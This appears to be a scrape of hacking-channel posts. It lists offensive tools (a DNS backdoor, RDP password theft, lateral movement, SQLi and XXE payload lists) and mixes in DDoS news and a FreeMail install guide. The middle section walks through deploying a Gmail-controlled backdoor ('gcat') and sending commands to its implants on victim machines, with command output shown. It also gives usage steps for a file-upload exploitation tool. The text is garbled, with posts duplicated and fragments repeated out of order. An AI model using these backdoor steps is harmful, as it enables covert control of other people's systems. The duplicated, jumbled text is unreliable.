β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Popular 2020 Hacking #Dockers :
- DetectionLab - Vagrant And Packer Scripts To Build A Lab Environment Complete With Security Tooling And Logging Best Practices
- Andor - Blind SQL Injection Tool With Golang
- SQL Injection Payload List
- WinPwn - Automation For Internal Windows Penetrationtest / AD-Security
- Ddoor - Cross Platform Backdoor Using Dns Txt Records
- Custom Header - Automatic Add New Header To Entire BurpSuite HTTP Requests
- SCShell - Fileless Lateral Movement Tool That Relies On ChangeServiceConfigA To Run Command
- Ultimate Facebook Scraper - A Bot Which Scrapes Almost Everything About A Facebook User'S Profile Including All Public Posts/Statuses Available On The User'S Timeline, Uploaded Photos, Tagged Photos, Videos, Friends List And Their Profile Photos
- FireProx - AWS API Gateway Management Tool For Creating On The Fly HTTP Pass-Through Proxies For Unique IP Rotation
- DNCI - Dot Net Code Injector
- RdpThief - Extracting Clear Text Passwords From Mstsc.Exe Using API Hooking
- Leprechaun - Tool Used To Map Out The Network Data Flow To Help Penetration Testers Identify Potentially Valuable Targets
- Glances - An Eye On Your System. A Top/Htop Alternative For GNU/Linux, BSD, Mac OS And Windows Operating Systems
- Sshtunnel - SSH Tunnels To Remote Server
- RE:TERNAL - Repo Containing Docker-Compose Files And Setup Scripts Without Having To Clone The Individual Reternal Components
- Antispy - A Free But Powerful Anti Virus And Rootkits Toolkit
- Flan - A Pretty Sweet Vulnerability Scanner By CloudFlare
- Corsy - CORS Misconfiguration Scanner
- Kali Linux 2019.4 Release - Penetration Testing and Ethical Hacking Linux Distribution
- XML External Entity (XXE) Injection Payload List
β git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Popular 2020 Hacking #Dockers :
- DetectionLab - Vagrant And Packer Scripts To Build A Lab Environment Complete With Security Tooling And Logging Best Practices
- Andor - Blind SQL Injection Tool With Golang
- SQL Injection Payload List
- WinPwn - Automation For Internal Windows Penetrationtest / AD-Security
- Ddoor - Cross Platform Backdoor Using Dns Txt Records
- Custom Header - Automatic Add New Header To Entire BurpSuite HTTP Requests
- SCShell - Fileless Lateral Movement Tool That Relies On ChangeServiceConfigA To Run Command
- Ultimate Facebook Scraper - A Bot Which Scrapes Almost Everything About A Facebook User'S Profile Including All Public Posts/Statuses Available On The User'S Timeline, Uploaded Photos, Tagged Photos, Videos, Friends List And Their Profile Photos
- FireProx - AWS API Gateway Management Tool For Creating On The Fly HTTP Pass-Through Proxies For Unique IP Rotation
- DNCI - Dot Net Code Injector
- RdpThief - Extracting Clear Text Passwords From Mstsc.Exe Using API Hooking
- Leprechaun - Tool Used To Map Out The Network Data Flow To Help Penetration Testers Identify Potentially Valuable Targets
- Glances - An Eye On Your System. A Top/Htop Alternative For GNU/Linux, BSD, Mac OS And Windows Operating Systems
- Sshtunnel - SSH Tunnels To Remote Server
- RE:TERNAL - Repo Containing Docker-Compose Files And Setup Scripts Without Having To Clone The Individual Reternal Components
- Antispy - A Free But Powerful Anti Virus And Rootkits Toolkit
- Flan - A Pretty Sweet Vulnerability Scanner By CloudFlare
- Corsy - CORS Misconfiguration Scanner
- Kali Linux 2019.4 Release - Penetration Testing and Ethical Hacking Linux Distribution
- XML External Entity (XXE) Injection Payload List
β git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
KitPloit - PenTest & Hacking Tools
DetectionLab - Vagrant And Packer Scripts To Build A Lab Environment Complete With Security Tooling And Logging Best Practices
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Mobile Device Security 2020 RESOURCES FOR BEGINERS :
The following are several of the resources covered in the Art of Hacking Series LiveLessons, Safari Live Training, and penetration testing books authored by Omar Santos.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Mobile Device Security 2020 RESOURCES FOR BEGINERS :
The following are several of the resources covered in the Art of Hacking Series LiveLessons, Safari Live Training, and penetration testing books authored by Omar Santos.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
theartofhacking.org
The Art of Hacking Video Courses and Live Training - Omar Santos
The Art of Hacking Video Courses and Live Training - A series of video courses, books, and live training by Omar Santos that help you enhance your cybersecurity career. You will learn the key tenets and the fundamentals of ethical hacking and security penetrationβ¦
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Amazon Cloud Service blocked a 2.3 Tbps DDoS attack in mid-February :
1οΈβ£Amazon said that its AWS Shield firewall blocked the most intense distributed denial of service (DDoS) attack to date in mid-February this year. The company disclosed in the recently published "AWS Shield Threat Landscape" report. Compared with the peak of 1.7 Tbps recorded in March 2018, the scale of this attack reached a record 2.3 Tbps.
2οΈβ£Although the name of the customer was not mentioned, Amazon revealed that the attack used the hijacked CLDAP web server, and employees of the company's AWS Shield department spent three days responding to the escalation of the threat.
3οΈβ£The good news is that thanks to the joint efforts of Internet Service Providers (ISPs), Content Delivery Networks (CDNs), and other Internet infrastructure companies, the current large-scale DDoS attacks have become quite rare.
4οΈβ£Link 11 pointed out in its first quarter 2020 report that the maximum DDoS attack traffic it mitigated was 406 Gbps. If we take the average, the single DDoS attack in the first quarter of this year is only about 5 Gbps.
5οΈβ£During the same period, the peak of DDoS attacks handled by Cloudflare exceeded 550 Gbps. Akamai announced this morning that the DDoS attack in the first week of June 2020 blocked only 1.44 Tbps of traffic.
6οΈβ£CLDAP is called "connectionless lightweight directory access protocol". As an alternative to the earlier LDAP protocol, it is mainly used to connect, search and modify shared directories on the Internet.
@UndercodeNews
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Amazon Cloud Service blocked a 2.3 Tbps DDoS attack in mid-February :
1οΈβ£Amazon said that its AWS Shield firewall blocked the most intense distributed denial of service (DDoS) attack to date in mid-February this year. The company disclosed in the recently published "AWS Shield Threat Landscape" report. Compared with the peak of 1.7 Tbps recorded in March 2018, the scale of this attack reached a record 2.3 Tbps.
2οΈβ£Although the name of the customer was not mentioned, Amazon revealed that the attack used the hijacked CLDAP web server, and employees of the company's AWS Shield department spent three days responding to the escalation of the threat.
3οΈβ£The good news is that thanks to the joint efforts of Internet Service Providers (ISPs), Content Delivery Networks (CDNs), and other Internet infrastructure companies, the current large-scale DDoS attacks have become quite rare.
4οΈβ£Link 11 pointed out in its first quarter 2020 report that the maximum DDoS attack traffic it mitigated was 406 Gbps. If we take the average, the single DDoS attack in the first quarter of this year is only about 5 Gbps.
5οΈβ£During the same period, the peak of DDoS attacks handled by Cloudflare exceeded 550 Gbps. Akamai announced this morning that the DDoS attack in the first week of June 2020 blocked only 1.44 Tbps of traffic.
6οΈβ£CLDAP is called "connectionless lightweight directory access protocol". As an alternative to the earlier LDAP protocol, it is mainly used to connect, search and modify shared directories on the Internet.
@UndercodeNews
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦A stealthy Python based backdoor that uses Gmail as a command and control server
Termux-Linux
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£ git clone https://github.com/byt3bl33d3r/gcat.git
2οΈβ£cd gcat
3οΈβ£Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:
#~ python gcat.py -list
> 964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
The output is a UUID string that uniquely identifies the system and the OS the implant is running on
4οΈβ£Let's issue a command to an implant:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
* Command sent successfully with jobid: SH3C4gv
5οΈβ£Lets get the results!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'
Windows IP Configuration
Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
-- SNIP --
β git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦A stealthy Python based backdoor that uses Gmail as a command and control server
Termux-Linux
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£ git clone https://github.com/byt3bl33d3r/gcat.git
2οΈβ£cd gcat
3οΈβ£Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:
#~ python gcat.py -list
> 964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
The output is a UUID string that uniquely identifies the system and the OS the implant is running on
4οΈβ£Let's issue a command to an implant:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
* Command sent successfully with jobid: SH3C4gv
5οΈβ£Lets get the results!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'
Windows IP Configuration
Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
-- SNIP --
β git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - byt3bl33d3r/gcat: A PoC backdoor that uses Gmail as a C&C server
A PoC backdoor that uses Gmail as a C&C server. Contribute to byt3bl33d3r/gcat development by creating an account on GitHub.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
#Tips for Text Manipulation
#grep Commands Cheatsheets
- Ryan's Tutorials Cheat Sheet
- DevNotes cheatsheet
#Regex
- grep + regex cheatsheet
- nixCraft Tutorial
#Converters
- BigBash - Open-source converter that generates a bash one-liner from an SQL Select query, no database necessary
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
#Tips for Text Manipulation
#grep Commands Cheatsheets
- Ryan's Tutorials Cheat Sheet
- DevNotes cheatsheet
#Regex
- grep + regex cheatsheet
- nixCraft Tutorial
#Converters
- BigBash - Open-source converter that generates a bash one-liner from an SQL Select query, no database necessary
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
ryanstutorials.net
Linux Tutorial - Grep Cheat Sheet
A basic Linux grep cheat sheet. Contains links to relevant sections in the tutorial.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Termux tips/commands :
pip install youtube-dl For installing Youtube-dl
Packages install python Installs Python
termux-setup-storage Gives TERMUX access to your file system
mkdir βdir-name For creating directory
cd βdir-nameβ For changing directory
cat βfile-nameβ For reading any file
mv /path/file /path where file is moved For moving files from one path
to another.
cp /path/file /path where to copy file For copying files from one path
to other
rm filename.file-extension For removing mentioned file from a certain directory.
ping βwebsite URLβ Helps verify IP level connectivity
toilet -f mono12 -F gay βyour textβ Presents text in a specified format.
apt show (app-name) Gives a short but detailed summary on mentioned name of desired app.
apt show (app-name) Installs the desired app
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Termux tips/commands :
pip install youtube-dl For installing Youtube-dl
Packages install python Installs Python
termux-setup-storage Gives TERMUX access to your file system
mkdir βdir-name For creating directory
cd βdir-nameβ For changing directory
cat βfile-nameβ For reading any file
mv /path/file /path where file is moved For moving files from one path
to another.
cp /path/file /path where to copy file For copying files from one path
to other
rm filename.file-extension For removing mentioned file from a certain directory.
ping βwebsite URLβ Helps verify IP level connectivity
toilet -f mono12 -F gay βyour textβ Presents text in a specified format.
apt show (app-name) Gives a short but detailed summary on mentioned name of desired app.
apt show (app-name) Installs the desired app
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦updated 2020 File upload vulnerability scanner and exploitation tool :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/almandin/fuxploider.git
2οΈβ£cd fuxploider
3οΈβ£pip3 install -r requirements.txt
If you have problems with pip (and if you use windows apparently) :
3οΈβ£python3 -m pip install -r requirements.txt
For Docker installation
4οΈβ£# Build the docker image
docker build -t almandin/fuxploider
5οΈβ£python3 fuxploider.py -h
6οΈβ£Example run :
python3 fuxploider.py --url https://awesomeFileUploadService.com --not-regex "wrong file type"
β Git 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦updated 2020 File upload vulnerability scanner and exploitation tool :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/almandin/fuxploider.git
2οΈβ£cd fuxploider
3οΈβ£pip3 install -r requirements.txt
If you have problems with pip (and if you use windows apparently) :
3οΈβ£python3 -m pip install -r requirements.txt
For Docker installation
4οΈβ£# Build the docker image
docker build -t almandin/fuxploider
5οΈβ£python3 fuxploider.py -h
6οΈβ£Example run :
python3 fuxploider.py --url https://awesomeFileUploadService.com --not-regex "wrong file type"
β Git 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - almandin/fuxploider: File upload vulnerability scanner and exploitation tool.
File upload vulnerability scanner and exploitation tool. - almandin/fuxploider
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Pro Users :
FreeMail standalone version installation guide
1οΈβ£Install the operating system on the server (recommended Freebsd 4.X), configure the network, DNS server
<Recommendation: When installing Freebsd, set the server to boot from the CD, and then use the Freebsd4.1 installation CD provided by us to start, enter directly The installation interface of the system can save the trouble of making an installation floppy disk.
After booting, select Skip kernel configureο standardο Entire hard diskο Install BootMgrο partition (swp:500M, root: rest)ο Install from CD-ROM>
2οΈβ£Considering that some background submission functions of the management interface are invoked in shell mode, the system default SHELL adopts /bin/sh or /bin/bash
<Note: After successfully using the installation CD provided by us, the system adopts /bin/bash> by default
3οΈβ£Prepare two directories:
/usr/mail /usr/disk The owner is nobody
chown nobody /usr/mail; chown nobody /usr/disk>
4οΈβ£Use freemail.tar.gz
<Note: This compressed package includes all packages of Freemail:
apache_1.3.12
ldap
mysql_3.23.13a
qmail_1.03
imap
run the following command:
gunzip freemail.tar.gz
tar xvf freemail.tar compressed package automatically Release to the directory /usr/install/FREEMAIL.>
5οΈβ£οΌThere are several configuration files under /usr/install/FREEMAIL/CONF: ------These files cannot be deleted during installation
-rw-r--r-- 1 root wheel 6 Sep 6 15:08 .quote - ----- Prompt system mailbox capacity
<Note: This file is used to set the size of the user's email mailbox, the initial setting is 10240K>
-rw-r--r-- 1 root wheel 194 Sep 6 14:36 ββfreemail. conf -----
freemail system configuration information _HOSTNAME=test.soim.com; -----------------Modify this item to the corresponding domain name.
_SMTPSERVER=127.0.0.1;
_WWWHOST=http://10.1.1.217;
_LDAPHOST=ldap://10.1.1.217;
_HOMEPAGE=http://10.1.1.217; -------------- The above three items are modified to the corresponding IP address _IP
=localhost;
_PASSWORD=coffee&tea;
_DEFAULTLANG=GB2312;
--------------------Note: The red font cannot be changed
-rw -r - r-- 1 root wheel 0 Sep 5 18:24 ip_domain.conf ------ virtual domain for use if there is no virtual domains, null
representation if the client login, just enter your account name without the domain name suffix, under the premise of the presence of a virtual domain name system, defaults are determined by ip_domain.conf
this document says: in virtual domain name system support, at the right time when the user uses the system SMTP / POP3 / IMAP functions, not On the premise of entering the domain name, how to determine the domain in which the user resolves.
Such as:
10.1.1.21 : local.freemail.com
-rw-r--r-- 1 root wheel 11 Sep 6 14:36 ββservers.ip
The IP address of the server in the FREEMAIL system. For the stand-alone version, only this Machine IP, such as:
10.1.1.217 -------------This item is modified to the corresponding IP address
-rw-r--r-- 1 root wheel 65 Sep 5 17:28 system.conf----- ----- System control information
long _MAXUSERS=200000;
char _SINGLE=``''T''''; //Is it a stand-alone system?
int _MAXHOST=10;
char _ENCRYPT='T'; //Whether the user password encryption?
-rw-r--r-- 1 root wheel 0 Sep 6 15:10 system.disk--------- Disk information in the system (usually empty)
-rw-r--r-- 1 root wheel 67 Sep 6 14:41 tcp.smtp --------- tcpserver configuration information
127.0.0.1:allow,RELAYCLIENT= "" ""
10.1.1: the allow, RELAYCLIENT = "" ""
: the you allow
- rw-r--r-- 1 root wheel 20 Sep 6 10:47 webmail.conf ------APACHE path information
/usr/apache/htdocs/ ---------cannot be changed
<Explanation: APACHE is installed in the /usr/apache directory by default in the installation program we provide, so this setting cannot be modified, otherwise, the page cannot be browsed correctly>
π¦#Pro Users :
FreeMail standalone version installation guide
1οΈβ£Install the operating system on the server (recommended Freebsd 4.X), configure the network, DNS server
<Recommendation: When installing Freebsd, set the server to boot from the CD, and then use the Freebsd4.1 installation CD provided by us to start, enter directly The installation interface of the system can save the trouble of making an installation floppy disk.
After booting, select Skip kernel configureο standardο Entire hard diskο Install BootMgrο partition (swp:500M, root: rest)ο Install from CD-ROM>
2οΈβ£Considering that some background submission functions of the management interface are invoked in shell mode, the system default SHELL adopts /bin/sh or /bin/bash
<Note: After successfully using the installation CD provided by us, the system adopts /bin/bash> by default
3οΈβ£Prepare two directories:
/usr/mail /usr/disk The owner is nobody
chown nobody /usr/mail; chown nobody /usr/disk>
4οΈβ£Use freemail.tar.gz
<Note: This compressed package includes all packages of Freemail:
apache_1.3.12
ldap
mysql_3.23.13a
qmail_1.03
imap
run the following command:
gunzip freemail.tar.gz
tar xvf freemail.tar compressed package automatically Release to the directory /usr/install/FREEMAIL.>
5οΈβ£οΌThere are several configuration files under /usr/install/FREEMAIL/CONF: ------These files cannot be deleted during installation
-rw-r--r-- 1 root wheel 6 Sep 6 15:08 .quote - ----- Prompt system mailbox capacity
<Note: This file is used to set the size of the user's email mailbox, the initial setting is 10240K>
-rw-r--r-- 1 root wheel 194 Sep 6 14:36 ββfreemail. conf -----
freemail system configuration information _HOSTNAME=test.soim.com; -----------------Modify this item to the corresponding domain name.
_SMTPSERVER=127.0.0.1;
_WWWHOST=http://10.1.1.217;
_LDAPHOST=ldap://10.1.1.217;
_HOMEPAGE=http://10.1.1.217; -------------- The above three items are modified to the corresponding IP address _IP
=localhost;
_PASSWORD=coffee&tea;
_DEFAULTLANG=GB2312;
--------------------Note: The red font cannot be changed
-rw -r - r-- 1 root wheel 0 Sep 5 18:24 ip_domain.conf ------ virtual domain for use if there is no virtual domains, null
representation if the client login, just enter your account name without the domain name suffix, under the premise of the presence of a virtual domain name system, defaults are determined by ip_domain.conf
this document says: in virtual domain name system support, at the right time when the user uses the system SMTP / POP3 / IMAP functions, not On the premise of entering the domain name, how to determine the domain in which the user resolves.
Such as:
10.1.1.21 : local.freemail.com
-rw-r--r-- 1 root wheel 11 Sep 6 14:36 ββservers.ip
The IP address of the server in the FREEMAIL system. For the stand-alone version, only this Machine IP, such as:
10.1.1.217 -------------This item is modified to the corresponding IP address
-rw-r--r-- 1 root wheel 65 Sep 5 17:28 system.conf----- ----- System control information
long _MAXUSERS=200000;
char _SINGLE=``''T''''; //Is it a stand-alone system?
int _MAXHOST=10;
char _ENCRYPT='T'; //Whether the user password encryption?
-rw-r--r-- 1 root wheel 0 Sep 6 15:10 system.disk--------- Disk information in the system (usually empty)
-rw-r--r-- 1 root wheel 67 Sep 6 14:41 tcp.smtp --------- tcpserver configuration information
127.0.0.1:allow,RELAYCLIENT= "" ""
10.1.1: the allow, RELAYCLIENT = "" ""
: the you allow
- rw-r--r-- 1 root wheel 20 Sep 6 10:47 webmail.conf ------APACHE path information
/usr/apache/htdocs/ ---------cannot be changed
<Explanation: APACHE is installed in the /usr/apache directory by default in the installation program we provide, so this setting cannot be modified, otherwise, the page cannot be browsed correctly>
6οΈβ£Enter the /usr/install/FREEMAIL directory and install in sequence :
./Apache.install.sh-------The path is /usr/apache
<Note: After installing this item, the ServerName
and ServerAdmin of the /usr/apache/conf/httpd.conf file should be modified to The corresponding domain and the E-mail account of the administrator, we have set up other items>
./ldap.install.sh-------The path is /usr/ldap
./mysql.install.sh--- ----The path is /usr/local
./src.install.sh -------The path is /usr/apache/cgi-bin
./qmail.install.sh-------The path is /var/qmail
<Note: You will be prompted to enter the domain name when installing this item, please enter it correctly>
./imap.install.sh ------The path is /usr/lib/courier_imap
<Description: After the above items are installed You can use
telnet localhost 80 //Check if apache has run
telnet localhost 143 //If imap has been installed correctly>
6. Modify the domain name settings in several pages under APACHE:
default.htm regtable.htm manager_default.htm forgetpassword.htm
<modify sss.soim.com/test.soim.com in the above pages to your settings Domain name>
8. After the system runs, add in /etc/rc.local:
/usr/apache/bin/httpd βf /usr/apache/conf/httpd.conf & //Start apache
/usr/local/ bin/safe_mysqld & //Start mysql
/var/qmail/rc & //Start qmail
/usr/local/bin/tcpserver -x /etc/tcp.smtp.cdb -R -c 100 -u 0 0 smtp /var/ qmail/bin/qmail-smtpd &
/usr/local/bin/tcpserver -c 100 -u 65534 0 pop3 /var/qmail/bin/qmail-popup mail-vip.soim.com /bin/checkpassword /var/qmail/ bin/qmail-pop3d Maildir &
/usr/local/bin/slapd -f /usr/ldap/conf/slapd-master.conf -p 389 -d 5> /dev/null 2>&1 &
/usr/local/bin/imapd.rc start &
used to define system startup settingsFreeMail standalone version installation guide1. Install the operating system on the server (recommended Freebsd 4.X), configure the network, DNS server
<Recommendation: When installing Freebsd, set the server to boot from the CD, and then use the Freebsd4.1 installation CD provided by us to start, enter directly The installation interface of the system can save the trouble of making an installation floppy disk.
After booting, select Skip kernel configureο standardο Entire hard diskο Install BootMgrο partition (swp:500M, root: rest)ο Install from CD-ROM>
2οΌConsidering that some background submission functions of the management interface are invoked in shell mode, the system default SHELL adopts /bin/sh or /bin/bash
<Note: After successfully using the installation CD provided by us, the system adopts /bin/bash> by default
3. Prepare two directories:
/usr/mail /usr/disk The owner is nobody
chown nobody /usr/mail; chown nobody /usr/disk>
4οΌUse freemail.tar.gz
<Note: This compressed package includes all packages of Freemail:
apache_1.3.12
ldap
mysql_3.23.13a
qmail_1.03
imap
run the following command:
gunzip freemail.tar.gz
tar xvf freemail.tar compressed package automatically Release to the directory /usr/install/FREEMAIL.>
./Apache.install.sh-------The path is /usr/apache
<Note: After installing this item, the ServerName
and ServerAdmin of the /usr/apache/conf/httpd.conf file should be modified to The corresponding domain and the E-mail account of the administrator, we have set up other items>
./ldap.install.sh-------The path is /usr/ldap
./mysql.install.sh--- ----The path is /usr/local
./src.install.sh -------The path is /usr/apache/cgi-bin
./qmail.install.sh-------The path is /var/qmail
<Note: You will be prompted to enter the domain name when installing this item, please enter it correctly>
./imap.install.sh ------The path is /usr/lib/courier_imap
<Description: After the above items are installed You can use
telnet localhost 80 //Check if apache has run
telnet localhost 143 //If imap has been installed correctly>
6. Modify the domain name settings in several pages under APACHE:
default.htm regtable.htm manager_default.htm forgetpassword.htm
<modify sss.soim.com/test.soim.com in the above pages to your settings Domain name>
8. After the system runs, add in /etc/rc.local:
/usr/apache/bin/httpd βf /usr/apache/conf/httpd.conf & //Start apache
/usr/local/ bin/safe_mysqld & //Start mysql
/var/qmail/rc & //Start qmail
/usr/local/bin/tcpserver -x /etc/tcp.smtp.cdb -R -c 100 -u 0 0 smtp /var/ qmail/bin/qmail-smtpd &
/usr/local/bin/tcpserver -c 100 -u 65534 0 pop3 /var/qmail/bin/qmail-popup mail-vip.soim.com /bin/checkpassword /var/qmail/ bin/qmail-pop3d Maildir &
/usr/local/bin/slapd -f /usr/ldap/conf/slapd-master.conf -p 389 -d 5> /dev/null 2>&1 &
/usr/local/bin/imapd.rc start &
used to define system startup settingsFreeMail standalone version installation guide1. Install the operating system on the server (recommended Freebsd 4.X), configure the network, DNS server
<Recommendation: When installing Freebsd, set the server to boot from the CD, and then use the Freebsd4.1 installation CD provided by us to start, enter directly The installation interface of the system can save the trouble of making an installation floppy disk.
After booting, select Skip kernel configureο standardο Entire hard diskο Install BootMgrο partition (swp:500M, root: rest)ο Install from CD-ROM>
2οΌConsidering that some background submission functions of the management interface are invoked in shell mode, the system default SHELL adopts /bin/sh or /bin/bash
<Note: After successfully using the installation CD provided by us, the system adopts /bin/bash> by default
3. Prepare two directories:
/usr/mail /usr/disk The owner is nobody
chown nobody /usr/mail; chown nobody /usr/disk>
4οΌUse freemail.tar.gz
<Note: This compressed package includes all packages of Freemail:
apache_1.3.12
ldap
mysql_3.23.13a
qmail_1.03
imap
run the following command:
gunzip freemail.tar.gz
tar xvf freemail.tar compressed package automatically Release to the directory /usr/install/FREEMAIL.>
5οΌThere are several configuration files under /usr/install/FREEMAIL/CONF: ------These files cannot be deleted during installation
-rw-r--r-- 1 root wheel 6 Sep 6 15:08 .quote - ----- Prompt system mailbox capacity
<Note: This file is used to set the size of the user's email mailbox, the initial setting is 10240K>
-rw-r--r-- 1 root wheel 194 Sep 6 14:36 ββfreemail. conf -----
freemail system configuration information _HOSTNAME=test.soim.com; -----------------Modify this item to the corresponding domain name.
_SMTPSERVER=127.0.0.1;
_WWWHOST=http://10.1.1.217;
_LDAPHOST=ldap://10.1.1.217;
_HOMEPAGE=http://10.1.1.217; -------------- The above three items are modified to the corresponding IP address _IP
=localhost;
_PASSWORD=coffee&tea;
_DEFAULTLANG=GB2312;
--------------------Note: The red font cannot be changed
-rw -r - r-- 1 root wheel 0 Sep 5 18:24 ip_domain.conf ------ virtual domain for use if there is no virtual domains, null
representation if the client login, just enter your account name without the domain name suffix, under the premise of the presence of a virtual domain name system, defaults are determined by ip_domain.conf
this document says: in virtual domain name system support, at the right time when the user uses the system SMTP / POP3 / IMAP functions, not On the premise of entering the domain name, how to determine the domain in which the user resolves.
Such as:
10.1.1.21 : local.freemail.com
-rw-r--r-- 1 root wheel 11 Sep 6 14:36 ββservers.ip
The IP address of the server in the FREEMAIL system. For the stand-alone version, only this Machine IP, such as:
10.1.1.217 -------------This item is modified to the corresponding IP address
-rw-r--r-- 1 root wheel 65 Sep 5 17:28 system.conf----- ----- System control information
long _MAXUSERS=200000;
char _SINGLE=``''T''''; //Is it a stand-alone system?
int _MAXHOST=10;
char _ENCRYPT='T'; //Whether the user password encryption?
-rw-r--r-- 1 root wheel 0 Sep 6 15:10 system.disk--------- Disk information in the system (usually empty)
-rw-r--r-- 1 root wheel 67 Sep 6 14:41 tcp.smtp --------- tcpserver configuration information
127.0.0.1:allow,RELAYCLIENT= "" ""
10.1.1: the allow, RELAYCLIENT = "" ""
: the you allow
- rw-r--r-- 1 root wheel 20 Sep 6 10:47 webmail.conf ------APACHE path information
/usr/apache/htdocs/ ---------cannot be changed
<Explanation: APACHE is installed in the /usr/apache directory by default in the installation program we provide, so this setting cannot be modified, otherwise, the page cannot be browsed correctly>
5. Enter the /usr/install/FREEMAIL directory and install in sequence :
./Apache.install.sh-------The path is /usr/apache
<Note: After installing this item, the ServerName
and ServerAdmin of the /usr/apache/conf/httpd.conf file should be modified to The corresponding domain and the E-mail account of the administrator, we have set up other items>
./ldap.install.sh-------The path is /usr/ldap
./mysql.install.sh--- ----The path is /usr/local
./src.install.sh -------The path is /usr/apache/cgi-bin
./qmail.install.sh-------The path is /var/qmail
<Note: You will be prompted to enter the domain name when installing this item, please enter it correctly>
./imap.install.sh ------The path is /usr/lib/courier_imap
<Description: After the above items are installed You can use
telnet localhost 80 //Check if apache has run
telnet localhost 143 //If imap has been installed correctly>
6. Modify the domain name settings in several pages under APACHE:
default.htm regtable.htm manager_default.htm forgetpassword.htm
<modify sss.soim.com/test.soim.com in the above pages to your settings Domain name>
8. After the system runs, add in /etc/rc.local:
/usr/apache/bin/httpd βf /usr/apache/conf/httpd.conf & //Start apache
/usr/local/ bin/safe_mysqld & //Start mysql
/var/qmail/rc & //Start qmail
/usr/local/bin/tcpserver -x /etc/tcp.smtp.cdb -R -c 100 -u 0 0 smtp /var/ qmail/bin/qmail-smtpd &
/usr/local/bin/tcpserver -c 100 -u 65534 0 pop3 /var/qmail/bin/qmail-popup mail-vip.soim.com /bin/checkpassword /var/qmail/ bin/qmail-pop3d Maildir &
-rw-r--r-- 1 root wheel 6 Sep 6 15:08 .quote - ----- Prompt system mailbox capacity
<Note: This file is used to set the size of the user's email mailbox, the initial setting is 10240K>
-rw-r--r-- 1 root wheel 194 Sep 6 14:36 ββfreemail. conf -----
freemail system configuration information _HOSTNAME=test.soim.com; -----------------Modify this item to the corresponding domain name.
_SMTPSERVER=127.0.0.1;
_WWWHOST=http://10.1.1.217;
_LDAPHOST=ldap://10.1.1.217;
_HOMEPAGE=http://10.1.1.217; -------------- The above three items are modified to the corresponding IP address _IP
=localhost;
_PASSWORD=coffee&tea;
_DEFAULTLANG=GB2312;
--------------------Note: The red font cannot be changed
-rw -r - r-- 1 root wheel 0 Sep 5 18:24 ip_domain.conf ------ virtual domain for use if there is no virtual domains, null
representation if the client login, just enter your account name without the domain name suffix, under the premise of the presence of a virtual domain name system, defaults are determined by ip_domain.conf
this document says: in virtual domain name system support, at the right time when the user uses the system SMTP / POP3 / IMAP functions, not On the premise of entering the domain name, how to determine the domain in which the user resolves.
Such as:
10.1.1.21 : local.freemail.com
-rw-r--r-- 1 root wheel 11 Sep 6 14:36 ββservers.ip
